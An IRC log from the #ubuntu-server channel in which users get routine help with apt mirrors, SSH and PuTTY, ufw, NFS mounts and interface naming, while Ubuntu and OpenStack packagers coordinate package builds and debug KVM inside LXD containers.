<Tyreal12> ## or updates from the Ubuntu security team.
<Tyreal12> deb http://au.archive.ubuntu.com/ubuntu/ trusty-backports main restricted universe multiverse
<Tyreal12> deb-src http://au.archive.ubuntu.com/ubuntu/ trusty-backports main restricted universe multiverse
<Tyreal12> deb http://security.ubuntu.com/ubuntu trusty-security main restricted
<Tyreal12> deb-src http://security.ubuntu.com/ubuntu trusty-security main restricted
<Tyreal12> deb http://security.ubuntu.com/ubuntu trusty-security universe
<Tyreal12> deb-src http://security.ubuntu.com/ubuntu trusty-security universe
<Tyreal12> deb http://security.ubuntu.com/ubuntu trusty-security multiverse
<Tyreal12> deb-src http://security.ubuntu.com/ubuntu trusty-security multiverse
<Tyreal12> ## Uncomment the following two lines to add software from Canonical's
<Tyreal12> ## 'partner' repository.
<Tyreal12> ## This software is not part of Ubuntu, but is offered by Canonical and the
<Tyreal12> ## respective vendors as a service to Ubuntu users.
<Tyreal12> # deb http://archive.canonical.com/ubuntu trusty partner
<Tyreal12> # deb-src http://archive.canonical.com/ubuntu trusty partner
<Tyreal12> ## Uncomment the following two lines to add software from Ubuntu's
<Tyreal12> ## 'extras' repository.
<Tyreal12> ## This software is not part of Ubuntu, but is offered by third-party
<Tyreal12> ## developers who want to ship their latest software.
<Tyreal12> # deb http://extras.ubuntu.com/ubuntu trusty main
<Tyreal12> # deb-src http://extras.ubuntu.com/ubuntu trusty main
<Tyreal12> thankyou for that
<bekks> *plonk*
<lordievader> Tyreal12: Please use pastebin next time.
<Tyreal12>  sorry
<lordievader> Tyreal12: It might be that your mirror is out of date, you could see if changing to the main mirror solves your problems.
<Tyreal12> forgot to pastebin it
<Tyreal12> how do i go about changing to main mirror
<lordievader> Remove the au from all th au.archive.u.c urls.
<lordievader> the*
<Tyreal12>  ok cool thats the answer i just found to
<TJ-> Tyreal12: "sudo sed -i 's/au\.\(archive\)/\1/' /etc/apt/sources.list"
<Tyreal12> i just changed them and doing an sudo update now
<Tyreal12> looks like its all worked
<Tyreal12> yep that did the trick
<TJ-> If the AU mirror is causing these issues we ought to report it to the mirror team
<Tyreal12> thank you so much for all of your help
<Tyreal12> thats a really good idea
<TJ-> Tyreal12: /join #ubuntu-mirrors and report it to the folks in that channel. Tell them the mirror seems to be missing Trusty packages/not responding correctly at all
<Tyreal12> and now onto the next step once the desktop is installed, the ftp
<Tyreal12> but i shall try not to bother you with it, once again thankyou for your help
<TJ-> Tyreal12: If you really need FTP, vsftpd, but be sure you actually need it first. There are other ways of moving files such as 'scp' which uses the SSH protocol/client
<Tyreal12> oh really? thankyou for that TJ
<Tyreal12> i shall look into it
<TJ-> Tyreal12: if you want to move trees of directories, read up on 'rsync' which also uses SSH under the hood for secure transfer
<quantic> Tyreal12: from an infosec perspective, ftp is the devil. :P
<Tyreal12> thankyou! TJ also if you wouldn't mind me asking one last thing that you might be able to suggest would be remote access within and outside of the home network
<Tyreal12> lol good to know
<quantic> Tyreal12: text console or gui?
<TJ-> Tyreal12: Everyone uses 'ssh' for remote administration, it is THE standard tool
<quantic> Tyreal12: console is easy - ssh. gui? that's a bit more involved.
<TJ-> Tyreal12: You can even forward X sessions over ssh if you insist on a GUI desktop on a 'server' :)
<Tyreal12> i would love to set up both to be honest with you
<quantic> Tyreal12: what TJ- said. X forwarding over SSH.
<quantic> TJ-: since I don't ever use it, what's a good X server for Windows?
<TJ-> quantic: *shrugs* ... what is this Windows? :D
<quantic> TJ-: lol
<quantic> Tyreal12: are you using Windows on the remote side?
<Tyreal12> lol TJ
<Tyreal12> i will be yeah, is that a bit more difficult? quantic
<quantic> Tyreal12: nope. see also: PuTTY.
<quantic> Tyreal12: http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html
<quantic> Tyreal12: pretty much the go-to ssh client for windows.
<Tyreal12> that would be 3rd part software correct?
<quantic> Tyreal12: and as for getting gui stuff running remotely, you'll need that plus an X server.
<quantic> Tyreal12: yes.
<quantic> Tyreal12: best x server I've found for windows is VcXsrv.
<quantic> Tyreal12: http://sourceforge.net/projects/vcxsrv/
<quantic> Tyreal12: Xming is also highly regarded.
<Tyreal12> quantic: is putty a trusted 3rd party? reason why i ask is cause i have recently formatted and gone through hell and back to fix my computer so i only want trusted software on it
<Tyreal12> by highly regarded do you mean secure?
<quantic> Tyreal12: in the world of ssh clients for windows, it's pretty much "putty or gtfo".
<TJ-> putty has some companion applications that will do scp for you... winscp
<Tyreal12> quantic: good to know lol
<quantic> TJ-: or pscp, which comes with putty.
<Tyreal12> as for accessing from ubuntu would i use the same program?
<quantic> Tyreal12: to level with you about security (its a big part of what I do professionally), the vast majority of security will be made or broken based on your practices, not on the software you use.
<quantic> Tyreal12: no, ubuntu (like any Linux/Unix system) has an ssh client built in. it's called "ssh".
<Tyreal12> quantic: thankyou for that
<Tyreal12> oh right lol duh
<tkxxx> How would I show the the contents of a text file in the shell, with auto numbered paragraphs please?
<quantic> tkxxx: im assuming that said paragraphs span multiple lines?
<tkxxx> quantic: Yes, it does.
<TJ-> tkxxx: how is a paragrpah defined?
<quantic> tkxxx: is there a line break in between, does the first line have an indent, etc?
<Tyreal12> quantic: aaah lubuntu didn't come with it
<Tyreal12> i had to install it
<quantic> Tyreal12: ssh?
<tkxxx> TJ-: Yes, it's a line break defining the paragraph split
<Tyreal12> quantic: yeah
<TJ-> tkxxx: something like awk 'BEGIN{P=1} N!=1{print P, $0; N=1} /^$/{N=0}' /path/to/file
<tkxxx> TJ-: Great, so awk is the tool to use for this? Absolutely appreciate this but is this the simplest way of doing it?
<tkxxx> TJ-: I'd also like to print the last paragraph to the shell (in a separate command)
<TJ-> tkxxx: I see to recall there is a tool that can do it in coreutils
<TJ-> tkxxx: see 'man fmt'
<quantic> gotta say... this is why I use ubuntu, anymore. in order distro channels that shall remain nameless, people are calling each other homophobic names and ranting about systemd.
<quantic> s/order/other/
<TJ-> tkxxx: That seems to be more about reflowing into paras
<TJ-> quantic: Oh, I like ranting about systemd too :p
<tkxxx> TJ-: Cool, will have a look into this.
<Tyreal> quantic: with putty do i download the putty.exe?
<quantic> Tyreal: http://the.earth.li/~sgtatham/putty/latest/x86/putty-0.65-installer.exe
<quantic> Tyreal: that'll get you the whole set.
<Tyreal> quantic: thankyou
<Tyreal> quantic: so using PuTTY and VcXsrv i can move files back and forth from server to the computer i access the server from
<quantic> Tyreal: eh, no.
<quantic> Tyreal: Putty and X allow you to use GUI programs that are running on the server remotely on the client.
<quantic> File transfer is accomplished through scp, like using WinSCP.
<Tyreal> thankyou for clearing that up for me
<quantic> It requires no setup beyond that of ssh. It's automatically running as long as an ssh server is running on the server.
<Tyreal> ok!
<Tyreal> which there should be considering that was the one i had ticket when i setup the server initially
<Tyreal> quantic may i ask you assistance one last time
<quantic> Tyreal: what's up?
<Tyreal> i've got ubuntu gui set up now. and i've got the PuTTY configuration up to remote access from Lubuntu, so my question is where do i go from here
<Tyreal> i need to find out what my domain name/ip address of the server
<Tyreal> i think i also need to configure the ssh
<fnewugfr94> hello! what would be the best way to block complete access from some ip or subnet on ubuntu server? i found possibility with ufw, but are there any other, maybe even better ways to do that?
<RoyK> fnewugfr94: just enable ufw - start with "ufw allow ssh" and "ufw enable" and take it from there. ufw is a frontend for iptables, so it's possible with raw iptables too, but ufw is a bit easier to learn
<fnewugfr94> RoyK: i already have enabled ufw and few rules for ssh and other services in it. i guess that there is still important order of rules?
<RoyK> the order is important, yes. if a rule at the top allows for access to something and the ip address in question is blocked further down, it won't help. see ufw insert
<fnewugfr94> RoyK: and the last question... what if I will need to block new ip addresses or subnets - can the number of deny rules affects response speed?
<RoyK> fnurl: generally iptables is so fast it won't matter much, but I guess a thousand rules or so may add some microseconds
<RoyK> fnurl: oops - that was for fnewugfr94 - sorry
<roasted> hi friends. Trying to get an NFS mount point set up between two ubuntu servers (14.04). This is my fstab on the client. It keeps saying bad fstab line 14. I can't seem to articulate where the issue is. http://pastebin.com/6edUYh5S
<roasted> everything is tabbed by the way
<RoyK> roasted: [rw]size isn't really necessary
<RoyK> roasted: but I beleive nfs4 is standard, so you might add sec=sys
<roasted> oh, I wonder...
<roasted> would I not put nfs4 instead of nfs under type?
<bekks> roasted: you should not use manual mountpoint inside /media since that directory is used by the automounter.
<RoyK> bekks: on desktops, mostly
<roasted> bekks: I switched to mnt to test but I got the same error.
<RoyK> what error?
<roasted> the fstab is bad on line 14 error
<roasted> as in, no change.
<qman__> you have a space and teh word defaults
<qman__> remove those
<qman__> there are only six fields, you have seven because of that
<RoyK> right - defaults isn't needed and if you want it anyway, use a comma, not a space
<roasted> boom
<roasted> that was it
<roasted> where do I overnight the beer? :P
<RoyK> upload it :D
<roasted> to my now-working owncloud?? :D
<RoyK> owncloud is nice ;)
<roasted> I dig it.
<roasted> I need to look into containers sometime.
<roasted> right now I have 14.04 on the hardware, then a 14.04 VM for external stuff (mostly to IP them separately and keep NAS internal and external stuff accessible externally)
<roasted> but I didn't want OC data in a virtual disk, so I NFS the mount point back to the RAID on the hardware-based-14.04-instance.
#ubuntu-server 2015-09-06
<eatingthenight> for my apache error logs can i log them right to sderr? i tried sending it to >&2 but i believe that only works for bash
<lordievader> Good morning.
<samthewildone> hello
<MoPac> I'm having an issue with a clean server install (has come even when repeating the install from scratch). In normal boot, ACPI PCC probe fails, a "starting version 219" systemd message appears, and that's it. I never get to the LUKS volume unlock screen
<MoPac> But if I choose advanced options and recovery mode, then opt to continue normal boot, everything works fine
<pmatulis> MoPac: what ubuntu release? and you're not using any graphics?
<MoPac> pmatulis: 15.04, just downloaded this week. I haven't explicitly added any extra graphics to the boot sequence, and there's no DE installed
<MoPac> Is there a script file I could look at that shows exactly what happens when "resume normal boot" is chosen in recovery mode?
#ubuntu-server 2016-09-05
<SupreX> can anybody just tell if I can use bcrypt with freeradius... or if I have to use a different encryption algorithm...
<SupreX> Is bcrypt an suitable option?
<SupreX> In case I would even be able to use it...
<SupreX> Nobody?
<SupreX> I ask again... if somebody missed my question.
<SupreX> can anybody just tell if I can use bcrypt with freeradius... or if I have to use a different encryption algorithm...
<SupreX> Is bcrypt an suitable option?
<SupreX> In case I would even be able to use it...
<jamespage> coreycb, I'm going to add a transitional package for neutron-lbaas-agent -> neutron-lbaasv2-agent
<jamespage> otherwise users will end up with both running
<jamespage> maybe
<jamespage> actually no I'm not - the upgrade itself will uninstall neutron-lbaas-agent due to the hard versioning bounds we use between neutron-lbaas packages
<xnox> python-oslo.privsep needs MIR, because python-nova now depends on it.
<ddellav> jamespage if you have some time today, please review and push the liberty branches of lp:~ddellav/ubuntu/+source/neutron-fwaas lp:~ddellav/ubuntu/+source/neutron-lbaas and lp:~ddellav/ubuntu/+source/neutron-vpnaas, vpnaas didn't have an upgrade but i imported anyway to keep the version number even with the others.
<xnox> ah 1616764
<xnox> ah bug #1616764
<ubottu> bug 1616764 in python-oslo.privsep (Ubuntu) "[MIR] python-oslo.privsep" [High,Incomplete] https://launchpad.net/bugs/1616764
<jamespage> xnox; lots of rbd's as of friday :-)
<xnox> =)
<xnox> jamespage, i wonder if i should tweak things in britney somehow.... at the moment mir check generates an excuse, and doesn't trigger autopkgtests at all =(
<xnox> imho the MIR check should not prevent running the adt tests
<stephanbuys> hi all, I'm using 16.04 systemd-networkd, and I've blacklisted (with a key file) all my interfaces, so that networkmanager doesn't manage them, but I'm getting a secondary IP address assigned to my primary network interface, even though its already set a static interface (using networkd) - any ideas?
<stephanbuys> I dont want to completely disable networkmanager as I use it for wifi configuration from time to time
<Geom`> can i put a variable inside the variable? e.g.....
<Geom`> RESULT=fail=0
<cpaelzer> Geom`: with a bit more context it might be easier to answer
<cpaelzer> Geom`: what language and what is what you want to achieve
<cpaelzer> stgraber: ever tried to run a kvm inside a lxd container?
<cpaelzer> stgraber: I thought I dropped all isolation I could, but it still blocks me pretending it couldn't work with kvm kernel things
<cpaelzer> stgraber: if you ever had that running and have some notes let me know
<jamespage> cpaelzer, I have
<jamespage> cpaelzer, https://github.com/openstack-charmers/openstack-on-lxd
<cpaelzer> jamespage: ta, while I'm not sure yet I can use your juju bits for what I'm currently doing it proves it has to work some way :-)
 * cpaelzer is reading through that stuff to identify potential workaroudns jamespage might have used
<jamespage> cpaelzer, the lxd profile is probably most interesting for you
<cpaelzer> yeah already reading that
<cpaelzer> I already had some parts of it, I'll have to check what difference remains
<cpaelzer> jamespage: ta++
<cpaelzer> jamespage: I had mostly the same solutions before but on commandline
<cpaelzer> jamespage: the only diff was on the /dev/mem and /dev/kvm
<cpaelzer> jamespage: there I had the sledgehammer of
<cpaelzer> lxc config set "${containername}" raw.lxc lxc.aa_profile=unconfined
<cpaelzer> jamespage: but combining what I had with your great yaml did the trick
<cpaelzer> so, thanks!
<stgraber> cpaelzer: lxc config device add <container> kvm unix-char path=/dev/kvm
 * jelly waves at Lornzer 
<Lornzer> :)
<Lornzer> hey guys, having some troubles with a webRTC server ( janus ) crashing from time to time - i assume its related to a 3rd party library setup which I did before
<Lornzer> the error log of the app gives me the following:
<Lornzer> janus: symbol lookup error: janus: undefined symbol: g_type_check_instance_is_fundamentally_a
<Lornzer> the 3rd party libraries I installed are libSRTP & usrSCTP, both configure && make install'ed on the same server which is having issues now
<jelly> Lornzer: do state which libraries you installed and how you managed to apparently configure; make; make install them under the /usr prefix
<Lornzer> https://gist.github.com/anonymous/6550f144e14cc0efc43ebd932ec2347a
<Lornzer> this is the script I used to install libSRTP
<Lornzer> the one for usrSCTP looks pretty much similar, except a different source of course
<jelly> Lornzer: do you perhaps have logs of the build and installation attempts for all the software mentioned, libSRTP, usrSCTP and janus?
<jelly> also which ubuntu release are you using and was this "janus" thing built specifically for that release?
<Lornzer> i didnt save any logs specifically - would syslog save any relevant info to that?
<Lornzer> using ubuntu xenial on the affected server
<Lornzer> oh i see
<Lornzer> its running on another instance without problems, turns out that instance is running ubuntu trusty
<Lornzer> this shouldnt affect the library setup process from the gist shared though, right?
<Lornzer> the janus binary is exactly the same size / date on both servers (one running ubuntu trusty, one ubuntu xenial / slightly different linux kernel versions) -> can I assume that this is the cause for the error message (instead of the libraries as i suspected originally)?
<cpaelzer> stgraber: thanks
<stgraber> cpaelzer: that's how I run my libvirt server, that and some block device passthrough from ZFS
<cpaelzer> stgraber: already got an even nicer solution including a custom default profile, but still it is reassuring that you are kind of referring the same
<cpaelzer> stgraber: just migrated my kvm guest via two "different" KVMs that are only split by lxd containers
<cpaelzer> so - working
<cpaelzer> althou one has to convince libvirt a bit that these are two different systems
<cpaelzer> :-)
<cpaelzer> stgraber: for shared images I just use a dir mountfrom host into all the guests being part of the same profile
<cpaelzer> stgraber: no need for more sophisticated block passthrough (yet)
<Lornzer> i reinstalled / compiled the janus gateway on the machine and it is working / not crashing so far now :) thx for leading me on the right path jelly
<Lornzer> while i'm at it: when talking about compiling packages from source = is this referring to the ./configure && make install process or does it refer to something else/more ?
<Lornzer> that question was too stupid, huh? ;) anyway thx for the help!
<jamespage> xnox: still around? Poking at our broken yakkety builds on a trusty host atm
<jamespage> with latest sbuild I hit:
<jamespage> D: Error run_fetch_install_packages(): Undefined subroutine &Sbuild::ResolverBase::deps_iterate called at /usr/share/perl5/Sbuild/ResolverBase.pm line 1042.
<xnox> jamespage, around, one sec.
<jamespage> xnox: that's provided by newer dpkg - but not entirelty happy with backporting that as well :-)
<xnox> jamespage, is $ dpkg -l sbuild libsbuild-perl => match versions?
<jamespage> xnox: yeah
<jamespage> libdpkg-perl is the providing library
<xnox> sigh.
<jamespage> xnox: I'm trying dropping in the deb from yakkety
<jamespage> not on our build server (ina vm)
<jamespage> sbuild is working now - need to see if dpkg exploded or not
<xnox> whilst that should work, that's not the minimum required version. I was expecting that 0.67.0-1 is enough with apt-keys removed on the host
<xnox> or welll 0.67.0-1ubuntu1. I can remember if you tried that already.
<jamespage> xnox: I did same issue - it also calls deps_iterate
<xnox> nested sbuild is the answer? =)
<xnox> schroot -> xenial -> run sbuild there to build things in yakkety
<xnox> you should be able to start xenial lxc container on trusty, no? and then push/pull files to that and sbuild from there?
<xnox> all of it sounds ugly. Is upgrade to xenial too painful?
<xnox> we may have a problem in launchpad, if trusty hosts can't build thing =/
<jamespage> xnox: quite possibly yes
<jamespage> xnox: lift and shift of deps_iterate directly into ResolveBase works around this for me
<PCdude> http://askubuntu.com/questions/820925/how-do-i-set-a-dns-server-in-maas-that-will-be-passed-on-to-the-nodes
<seph> hello
<PCdude> seph: hello?
<guest> I am wanting to know If there is any way to enable a GUI on my server
<lordievader> guest: Why do you want to do that? Is there a need for a gui on your server?
<guest> Yes, it is for my personal use, and I was wanting to do it as a learning experence
<lordievader> The easiest way is installing a lightweight desktop, it will pull in all the X dependencies.
<guest> Ok, How do you do that? do I use the sudo command to install it
<OerHeks> lightweight desktop: openbox, mate-desktop, lubuntu-desktop or xubuntu-desktop >> sudo apt-get install <package> # and to activate: ctrl alt F7
<guest> thank you
<guest> @OerHeks I know this mostlikly to never happen but could you install more then one GUI
<guest> For the server
<OerHeks> guest, sure, then you can switch after logging out > switch DE > login
<guest> oh ok
<lordievader> You can install as many as you want ;)
<lordievader> Unless disk space runs out or something.
<guest> Ah, very cool I though if you installed more then one it would break it or something like a but
<OerHeks> guest, but remember, server starts in tty2 = ctrl alt F2, to get the gui: ctrl alt F7
<guest> I understand
<guest> ok
<guest> Now when I use the gui will it be easy to navagate all the server tools
<lordievader> Most server tools are commandline only.
<guest> I checked everything during installing my server
<guest> oh ok
<guest> Thank you for all your help :)
<Fiki> hello guys, I can't fix the OpenSSL Padding Oracle(CVE-2016-2107), even though my openssl is version 1.0.2h and I have restarted my server, btw version 14.04.05
<PCdude> I get the following error
<PCdude> http://imgur.com/a/Z47K1
<PCdude> the log file does not show anything
<PCdude> any idea on how to solve it?
#ubuntu-server 2016-09-06
<wbill> is ssh installed/open by default?
<cncr04s> don't think so
<cncr04s> there is an option while installing
<PCdude> I am installing openstack and during the install on a Ubuntu machine I get the following error log
<PCdude> http://pastebin.com/raw/A7qtJm4v
<PCdude> there is apparently an deployment timeout, but where can I see more information on why it did that or how can I solve it?
<lordievader> Good morning.
<jamespage> coreycb, ddellav: yakkety branch builds functional again - I had to backport sbuild from yakkety for trusty, and then in-place patch it for compat with dpkg
<cpaelzer> stgraber: jamespage: did you also have success with that in regard to a precise kvm running in the container?
<cpaelzer> that seems to need "more"
 * cpaelzer is trying to unvocer what from that all to silent libvirt/qemu/kvm team
<sarthor> Hi, There is no "/etc/network/interfaces and /etc/udev/rules.d/70-persistent-net.rules" . how to create that file, Using ubuntu-server 16.04
<cpaelzer> sarthor: maybe all you have is in /etc/network/interfaces.d ?
<cpaelzer> sarthor: otherwise "man interfaces" gets you a starting point to write your own file if that is what you want
<cpaelzer> sarthor: networkctl might also be a tool to find where your stuff currently is, as on desktop that is responsible for most things
<cpaelzer> sarthor: the multitude of network backends ifupdown, networkd, NetworkManager can be a apain - that is what https://lists.ubuntu.com/archives/ubuntu-devel/2016-July/039464.html is for
<sarthor> cpaelzer: there is not networkctl command or package
<sarthor> no*
<cpaelzer> sarthor: networkctl is part of systemd
<cpaelzer> sarthor: are you running 16.04 server installed from the iso or an upgrade from an older version?
<cpaelzer> stgraber: jamespage: step1 a pure qemu works in precise as well, must be libvirt who doesn't want me to like it
<cpaelzer> stgraber: jamespage: I even got a basic libvirt/virsh based guest to start now - must be some delta between this and the uvt used template
<cpaelzer> na not true, was type qemu - type kvm failed
<cpaelzer> stgraber: jamespage: it really points to libvirt now, I get the same qemu commandline running that libvirt reports as failing
<cpaelzer> so less lxd more libvirt debugging for now
<jamespage> ddellav, coreycb: either of you two looked at the barbcian unit test failures?
<jamespage> I can't figure out what's going on
<roaksoax> 8
<coreycb> jamespage, I didn't make any progres on barbican
<coreycb> jamespage, I think I got the horizon xstatic patch working but horizon still needs some work
<coreycb> jamespage, can you promote heat 1:5.0.1-0ubuntu3.1~cloud1 and neutron 2:7.1.2-0ubuntu1~cloud0 to liberty-proposed?
<jamespage> coreycb, I went and asked in openstack-barbican
<jamespage> lets see
<coreycb> jamespage, thanks for fixing up the yakkety branch builds
<jamespage> coreycb, its ugly but works
<cpaelzer> stgraber: jamespage: fyi I got it working, qemu-kvm worked right away - the issue with libvirt back in precise was that it runs as a different user and with that it was unable to run. Setting group=root in /etc/libvirt/qemu.conf was enough
<cpaelzer> stgraber: jamespage: there might be some lxd magic to do this via the profile as well, but I wanted to let you know in case someone else asks again
<jamespage> coreycb, ddellav: newton-staging passes a smoke test - promoting what we have now to -proposed
<coreycb> jamespage, sounds good
<jamespage> coreycb, I had to wedge fixes into n-gateway and n-api for misc bits
<jamespage> but it works ok
<coreycb> jamespage, alright I'm going to put some focus on horizon today.  seems a bit busted since b2.
<jamespage> coreycb, ok
<cpaelzer> rbasak: ever  ran into the issue that uvt creates a "too new" qcow2 image?
<cpaelzer> for 12.04
<cpaelzer> well ut is only in a ppa for 12.04 so you let me know how much you consider it supported anyway
<cpaelzer> it seems that it creates disks with lazy_refcounts when driven by the python interface
<cpaelzer> and the qemu in 12.04 isn't new enough to understand that
<patdk-wk> 12.04 only has a few months left on it
<cpaelzer> consider it passion that I still try to care :-)
<coreycb> jamespage, nm horizon looked ok in b2, must just be b3 that's busted.
<jamespage> coreycb, ugly?
<coreycb> jamespage, slightly :)  it could be an issue with the xstatic patch.  I'll dig some more.
<rbasak> cpaelzer: good timing, I'm working on uvtool right now.
<rbasak> cpaelzer: sounds like a valid bug, and I'd take a patch to detect 12.04 and supply the right parameter to create an older qcow if you care to write one.
<cpaelzer> rbasak: I never worked with the python libvirt interface before - what is the timing you would need that patch?
<cpaelzer> I'd know the commandline qemu-img arg right now :-)
<cpaelzer> but not how I would have (if I even can) tweak it in the python based image creation
<rbasak> cpaelzer: no particular rush. I intend to push my current work to Launchpad (and move from bzr to git) but not upload to Ubuntu until next cycle. But I hope to get build recipes working for all supported Ubuntu releases so the PPA will be a place to get the new stuff in advance of an Ubuntu upload.
<rbasak> cpaelzer: one concern might be that I don't inadvertenly break anything for 12.04 in the updates I'm working on right now.
<rbasak> cpaelzer: thinking about it, detecting the right versions of qemu would probably be better than trying to detect the right Ubuntu release.
<cpaelzer> rbasak: I opened bug 1620633 so we can channel and document our discussion/decision there
<ubottu> bug 1620633 in uvtool (Ubuntu) "qcow image created in precise is not usable" [Undecided,New] https://launchpad.net/bugs/1620633
<cpaelzer> I'm torn between "let's do it" and "is it still worth"
<cpaelzer> If there is a silly fast local workaround that would come to our mind I'd prefer that I thnik
<cpaelzer> but then I lack the pytohn libvirt skill to see the workaround clearly
<rbasak> cpaelzer: thanks
<cpaelzer> rbasak: I'm soon in a series of calls for the next 4 hours so the lp bug is also kind of a mind-fridge for me to not forget it
<cpaelzer> oh - only 3 hours - yeah improvment
<rbasak> cpaelzer: it looks like it can all be done in the XML - https://libvirt.org/formatstorage.html#StorageVolTarget has the definition, and the compat and feature/lazy_refcounts tags look relevant.
<rbasak> cpaelzer: then in uvtool, uvtool/libvirt/kvm.py:create_cow_volume_by_path would be the function to change.
<rbasak> I'm not sure how to decide on whether to enable compatiblity mode or not.
<cpaelzer> I found the function, thanks for the spec pointer above
<cpaelzer> rbasak: I'll hack it in locally to see if it even fixes the issue
<cpaelzer> then we can think/decide further
<rbasak> OK
<cpaelzer> and I take our talk to the bug for now
<ddellav> coreycb please review and push the liberty branches of lp:~ddellav/ubuntu/+source/neutron-fwaas lp:~ddellav/ubuntu/+source/neutron-lbaas and lp:~ddellav/ubuntu/+source/neutron-vpnaas, vpnaas didn't have an upgrade but i imported anyway to keep the version number even with the others.
<coreycb> ddellav, thanks, neutron-fwaas uploaded.  I think the others aren't needed since they're basically no-ops.
<NOVAtechies> hello all
<NOVAtechies> i'm in a bit of a pickle
<NOVAtechies> I'm running 16.04 with an old R415 and my interfaces are being renamed randomly on reboots to weird names like enps1e0 and stuff like that
<NOVAtechies> plus my MACs are being renamed like a4:a4:a4:a4:a4 and the like.
<NOVAtechies> I have a feeling that systemd is enjoying messing my system up but I dont' know exactly why this is happening.  my interfaces configs all look good, my rules in /udev/rules.d look good but I can't figure it out.
<nacc> NOVAtechies: your MAC is changing? for a physical device?
<NOVAtechies> nacc, yep.  I feel like that points to a corrupted file or something.  over in #ubuntu they are suggesting I remap everything in my udev rules and add net.ifnames=0
<NOVAtechies> so apparently the net.ifnames=0 fixed what was going on.  black magic wizardy if you ask me...
<genii> NOVAtechies: It's a constant interface naming scheme Dell invented. So interfaces always get the same unique identifiers like UUIDS on hard drives
<NOVAtechies> ahhh
<NOVAtechies> genii, i had no idea that was a Dell problem.  I assumed it was a systemd error again
<kbaegis> Hi all.  My openvswitch internal ports get a randomized mac on every reboot
<kbaegis> Very annoying problem, as these need to use DHCP
<kbaegis> Anyone seen this and come up with a workaround?
<kbaegis> Can confirm that this is an issue for anyone running Xenial and openvswitch
<seph> http://razorbelle.com/public/HTML/life.html
<seph> oops
<seph> do you guys use tabs or spaces? i know that python documentation says spaces are "right", but i cant wrap my mind around how someone would prefer spaces to tabs... a space is a space and a tab is an indent, thats what those words mean... to use spaces as tabs violates the meaning of the word "space", uses extra characters and keystrokes, prevents people from customizing the indent size
<seph> in their editor to their liking, and is impossible to fuck up and use too many or too few... i dont care what python says, im using tabs lol
<Ussat> um....ok
<nacc> seph: totally offtopic?
<ppetraki> seph, I don't even use tabs in C/C++ anymore, not interested in lining up formatting anymore because there's a mix of tabs & spaces. Form a strong opinion on the subject then tell everyone else they're wrong ;-}
<coreycb> jamespage, ddellav: horizon b3 uploaded.  the openstack-dashboard charm needed some templating updates for newton so I'll have reviews incoming for those.
<jamespage> coreycb, awesome - thankyou
<jamespage> I've been using the newton-b3 topic for reviews
<coreycb> jamespage, ok
<jerichowasahoax> How do I Kerberize a Postfix server without LDAP?
<jerichowasahoax> Because LDAP keeps throwing "invalid credentials" errors at me even though I'm entering my password 100% correctly
<kbaegis> Hi all
<kbaegis> So what's the appropriate way to set a mac address artificially on boot?
<kbaegis> In ubuntu.  Is there an /etc/conf.d/net?
<bekks> !info macchanger | kbaegis
<ubottu> kbaegis: macchanger (source: macchanger): utility for manipulating the MAC address of network interfaces. In component universe, is extra. Version 1.7.0-5.3 (xenial), package size 186 kB, installed size 677 kB (Only available for linux-any)
<kbaegis> bekks: That's not correct.  You can do that with iproute2 as well
<kbaegis> I need persistent configuration
<kbaegis> Not a 1 off
<bekks> kbaegis: I never said that macchanger is the only tool.
<kbaegis> bekks: :)
<bekks> kbaegis: If you need a persistent configuration, you need to change the PROM of the NIC.
<kbaegis> bekks: That's absurd.  You can't run scripts against the interfaces on boot?
<bekks> Thats not a persistent configuration.
<kbaegis> bekks: There's got to be an init hook
<kbaegis> bekks: For our purposes it is :)
<bekks> Which isnt persistent, too. Persistent means that you would change the MAC, even when pulling it out of box A and plugin it into box B.
<kbaegis> Okay. So you could make it persistent with init scripts, the original mac, and udev rules
<kbaegis> I just don't know how this is done on Ubuntu
<kbaegis> bekks: semantics of what you mean when you say persistent aside
<bekks> kbaegis: If you think so.
<kbaegis> So on gentoo we use /etc/conf.d/net
<kbaegis> What's the equivalent in Ubuntu?
<Sling>  /etc/network/interfaces
<kbaegis> I see /etc/network/interfaces.d/, but no templates
<kbaegis> Oh, ../interfaces.  k
<Sling> (if that's what you mean)
<kbaegis> Yeah.  Evidently ovs punts the mac address configuration over to the system, even for internal ports.  That's exactly what I needed
<kbaegis> ty
<kbaegis> Thanks a lot Sling
<Ryan_Lane> hey... did 14.04 switch python to 2.7.12?
<Ryan_Lane> because now all of my virtualenvs are complaining that datetime is missing
<sarnold> Ryan_Lane: it looks like 14.04 LTS ought to be on 2.7.6-derived python: https://launchpad.net/ubuntu/+source/python2.7
<Ryan_Lane> hm. it looks like some package install caused python to somehow upgrade to 2.7.12
<Ryan_Lane> bah. someone did an upgrade to 16.04
<Ryan_Lane> sorry for the stupid questions :)
<sarnold> ha :) that'd be a confusing jump indeed :)
#ubuntu-server 2016-09-07
<cpaelzer> rharper: powersj: my qemu testing found the first bug we didn't have on our radar yet
<cpaelzer> so while still uncomplete to an ashaming amoutn already worth something
<cpaelzer> I found an upstream qemu bug and a fix, added Ubuntu(qemu) to it and subscribed the server Team
<cpaelzer> rbasak: fyi ^^
<rbasak> cpaelzer: good job!
<jamespage> coreycb, figured out the barbican test failures - we need newer positional
<jamespage> doing that now
<coreycb> jamespage, hello, when you get a chance heat 1:5.0.1-0ubuntu3.1~cloud1 is ready to promote to liberty-proposed
<coreycb> jamespage, any news on barbican?
<coreycb> ddellav, how's openstack-trove going?
<ddellav> coreycb ah forgot about that one, i think it's done, let me double check
<coreycb> ddellav, jamespage: I took a pass through newton pkg tip failures and rebuilding those now (non-barbican/trove)
<jamespage> coreycb, barbican should build now I think
 * jamespage checks
<coreycb> jamespage, cool
<jamespage> coreycb, it was https://launchpad.net/ubuntu/+source/python-positional/1.1.1-0ubuntu1
<coreycb> jamespage, ah just needed a new version?
<jamespage> coreycb, yeah I think so
<coreycb> jamespage, awesome.  that wasn't obvious from what I recall.
<epinky> anyone has used isc-dhcp-server as a dhcp server in a multivlan environment, it's leasing very very slow
<epinky> can anyone help?
<jamespage> coreycb, ok barbican is happy again
<jamespage> coreycb, I'll do the b3 upload now
<coreycb> jamespage, \o/
<jamespage> coreycb, ddellav: any ideas on the trove failure?
<jamespage> that's our last outstanding I think
<coreycb> jamespage, ddellav: just looking at tox.ini for trove and they run ostestr  --serial
<jamespage> coreycb, might be it
<jamespage> worth a try
<jamespage> coreycb, http://autopkgtest.ubuntu.com/packages/h/horizon/yakkety/amd64
<jamespage> hmm
<coreycb> jamespage, I thought we got rid of openstack-dashboard-ubuntu-theme
<jamespage> #not sure
<jamespage> coreycb, you look at trove
<jamespage> I'll poke at that
